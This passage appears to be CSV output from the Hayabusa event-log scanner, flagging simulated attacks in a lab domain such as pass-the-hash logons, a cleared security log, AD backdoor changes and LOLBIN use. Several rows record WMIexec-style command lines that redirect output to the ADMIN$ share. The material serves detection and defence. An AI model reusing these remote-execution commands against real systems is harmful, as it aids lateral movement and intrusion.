+09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:10:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x3cc | User: SRVDEFENDER01$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da321f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da324f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 
- Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da324f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3273,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3273,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3292,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3292,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da32af,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da32af,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.258 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0xd44 | User: SRVDEFENDER01$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.435 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x1b98 | User: SRVDEFENDER01$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 
0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 
0x4da321f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:26:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User 